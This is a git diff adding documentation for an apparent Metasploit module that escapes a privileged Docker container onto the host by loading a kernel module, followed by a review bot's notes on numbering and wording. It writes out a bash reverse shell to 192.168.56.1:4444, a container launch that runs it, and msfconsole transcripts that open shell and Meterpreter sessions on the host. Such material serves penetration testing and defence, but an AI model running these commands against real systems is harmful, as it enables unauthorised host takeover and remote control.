diff --git a/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md b/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md new file mode 100644 index 0000000000..fd34ba8795 --- /dev/null +++ b/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md 
@@ -0,0 +1,106 @@ +## Vulnerable Application + +This module performs a container escape onto the host as the daemon user. It +takes advantage of the SYS_MODULE capability. If that exists and the linux +headers are available to compile on the target, then we can escape onto the host. + +### Creating A Testing Environment + +- Get a VM that you want to test on (or your own machine) +- Install Docker +- Run a listener (can be anything but well use an example of a bash reverse shell) +```msf +msf6 > use payload/cmd/unix/reverse_bash +msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 +lhost => 192.168.56.1 +msf6 payload(cmd/unix/reverse_bash) > generate -f raw +bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' +msf6 payload(cmd/unix/reverse_bash) > exploit -z +[*] Payload Handler Started as Job 0 +msf6 payload(cmd/unix/reverse_bash) > +[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444 +``` +- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host. Container must be the same OS as host) +```bash +docker run --rm -it -p 4444:4444 --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' +``` +- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example +```bash +apt update && apt install -y gcc make kmod linux-headers-$(uname -r) +``` + +## Verification Steps + +1. start msfconsole +2. get a session +1. `use exploit/linux/local/docker_privileged_container_kernel_escape` +2. `set SESSION [session]` +3. `set PAYLOAD [payload]` +6. `exploit` + +## Options + +### KernelModuleName + +The name that the kernel module will be called in the system. The default if no name is set is "{rand(8)}" + +### WritableContainerDir + +A directory where we can write files inside the container (default is /tmp/.{rand(4)}). This is needed to drop the payload into the container. 
+ +### ReloadKernelModule + +Rebuilds and reloads kernel module if its already loaded in case of repeat runs. + +## Scenarios + +### Container Escape from debian linux with reverse bash + +```msf +msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)" +[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126) +msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape +[*] Using configured payload cmd/unix/reverse_bash +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 +session => 1 +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check +[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z + +[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 +[*] [2023.11.07-21:42:42] Creating files +[*] [2023.11.07-21:42:43] Making kernel module +[+] [2023.11.07-21:42:43] Kernel module compiled successfully +[*] [2023.11.07-21:42:43] Loading kernel module +[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500 +[*] This is CredCollect, I have the conn! 
+``` + +### Container Escape from arch linux with meterpreter + +```msf +msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers" +[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106) +msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape +[*] Using configured payload cmd/unix/reverse_bash +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 +session => 2 +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 +lhost => vboxnet0 +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check +[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z + +[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 +[*] [2023.11.07-21:48:41] Creating files +[*] [2023.11.07-21:48:43] Making kernel module +[+] [2023.11.07-21:48:44] Kernel module compiled successfully +[*] [2023.11.07-21:48:44] Loading kernel module +[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106 +[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500 +[*] This is CredCollect, I have the conn! +[!] [2023.11.07-21:48:45] Attempting to delete working directory /tmp/.IvLx +[*] Session 4 created in the background. +```
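Review bot: The "Verification Steps" list in this hunk is numbered 1, 2, 1, 2, 3, 6, and the "Create a privileged container" bullet says the port is forwarded "in order to use a bind shell from the host" while the example command that follows is a reverse shell back to 192.168.56.1:4444, which contradicts the listener set up just above. Suggest renumbering the steps 1 through 6 and rewording the bullet to match the reverse-shell flow actually shown (the `-p 4444:4444` mapping is not needed for an outbound reverse connection). The same bullet's "Container must be the same OS as host" would be more precise as a note that the `linux-headers-$(uname -r)` package installed inside the container has to match the host's running kernel, since that is what the module builds against; the container's userland matching the host is only a convenient way to get that. Minor wording while you are there: "well use" should be "we'll use", "its already loaded" should be "it's already loaded", and "linux headers" should be "Linux headers".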